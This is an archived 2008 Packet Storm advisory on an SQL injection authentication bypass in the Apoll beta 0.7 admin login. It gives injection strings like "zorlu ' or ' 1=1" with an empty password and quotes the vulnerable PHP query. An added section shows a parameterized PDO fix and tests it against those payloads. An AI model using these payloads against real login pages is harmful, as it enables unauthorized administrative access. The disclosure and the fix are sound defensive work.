apoll-bypass.txt

Date: 04 Nov 2008 00:00:00
Reported by: ZoRLu
Type: packetstorm
Source: packetstormsecurity.com

Apoll version Remote Auth Bypass Vulnerability, beta 0.7, Exploit in admin login

Code
`[~] Apoll version Remote Auth Bypass Vulnerability  
[~]  
[~] version: beta 0.7  
[~]  
[~] script download: http://www.miticdjd.com/download/3/  
[~] ----------------------------------------------------------  
[~] Discovered By: ZoRLu  
[~]  
[~] Date: 03.11.2008  
[~]  
[~] Home: www.z0rlu.blogspot.com  
[~]  
[~] contact: [email protected]  
[~]  
[~] NOTE: LONELINESS LOST ITS MEANING IN MY LONELINESS : ( (  
[~]   
[~] NOTE: because of the damn KPSS I may take a break from the net : (  
[~]  
[~] -----------------------------------------------------------  
  
admin login:  
  
http://localhost/apoll/admin/index.php  
  
  
Exploit:  
  
username: [real_admin_or_user_name] ' or ' 1=1  
  
password: don't write anything  
  
note: generally admin name: admin   
  
  
example for my localhost:  
  
admin: zorlu  
  
user: salla  
  
  
  
username: zorlu ' or ' 1=1  
  
password: empty  
  
or I added user salla and applied it to get a true result ( salla is not admin but you log in to the admin panel : ) )  
  
username: salla ' or ' 1=1  
  
password: empty   
  
  
file:   
  
apoll/admin/index.php  
  
code:  
  
$user = $_SESSION['user'];  
$pass = $_SESSION['pass'];  
  
$mysql = @mysql_query("SELECT * FROM ap_users WHERE username='$user' AND password='$pass'");  
$num = @mysql_num_rows($mysql);  
  
  
  
  
[~]----------------------------------------------------------------------  
[~] Greetz tO: str0ke & all Muslim HaCkeRs  
[~]  
[~] yildirimordulari.org & darkc0de.com  
[~]  
[~]----------------------------------------------------------------------  
  
`
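
The query quoted from `apoll/admin/index.php` interpolates `$user` and `$pass` directly into the SQL string, so a quote in the user name changes the `WHERE` clause. The following hardened form of that check is an added example, not code from Apoll or from the advisory. Assumptions: PDO with an in-memory SQLite database stands in for MySQL so it runs offline, passwords are stored as `password_hash()` output (the page does not show how Apoll stores them), and `check_login` and the sample passwords are hypothetical.

```php
<?php
// Added example: parameterized credential check for the ap_users table.
// Table and column names come from the advisory; everything else is constructed.
declare(strict_types=1);

$db = new PDO('sqlite::memory:');
$db->setAttribute(PDO::ATTR_ERRMODE, PDO::ERRMODE_EXCEPTION);
$db->exec('CREATE TABLE ap_users (username TEXT PRIMARY KEY, password TEXT NOT NULL)');

// Constructed sample accounts; only password hashes are stored.
$seed = $db->prepare('INSERT INTO ap_users (username, password) VALUES (?, ?)');
$seed->execute(['zorlu', password_hash('constructed-admin-pass', PASSWORD_DEFAULT)]);
$seed->execute(['salla', password_hash('constructed-user-pass', PASSWORD_DEFAULT)]);

/**
 * Returns true only when $user exists and $pass matches the stored hash.
 * The user name is bound as a parameter, so quotes in it are data, not SQL.
 */
function check_login(PDO $db, string $user, string $pass): bool
{
    $stmt = $db->prepare('SELECT password FROM ap_users WHERE username = :u');
    $stmt->execute([':u' => $user]);
    $hash = $stmt->fetchColumn();

    // Unknown users are verified against a dummy hash so both paths do the same work.
    static $dummy = null;
    $dummy ??= password_hash('unused', PASSWORD_DEFAULT);
    $ok = password_verify($pass, $hash === false ? $dummy : (string) $hash);

    return $ok && $hash !== false;
}

// Inputs to try: one valid login, the two user-name strings from the advisory,
// and a real user name with an empty password.
$cases = [
    ['zorlu', 'constructed-admin-pass'],
    ["zorlu ' or ' 1=1", ''],
    ["salla ' or ' 1=1", ''],
    ['zorlu', ''],
];
foreach ($cases as [$u, $p]) {
    printf("%-20s => %s\n", $u, check_login($db, $u, $p) ? 'accepted' : 'rejected');
}
```

The same binding works against MySQL through PDO or `mysqli` prepared statements; the `mysql_*` functions used in the quoted code offer no parameter binding and were removed in PHP 7.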
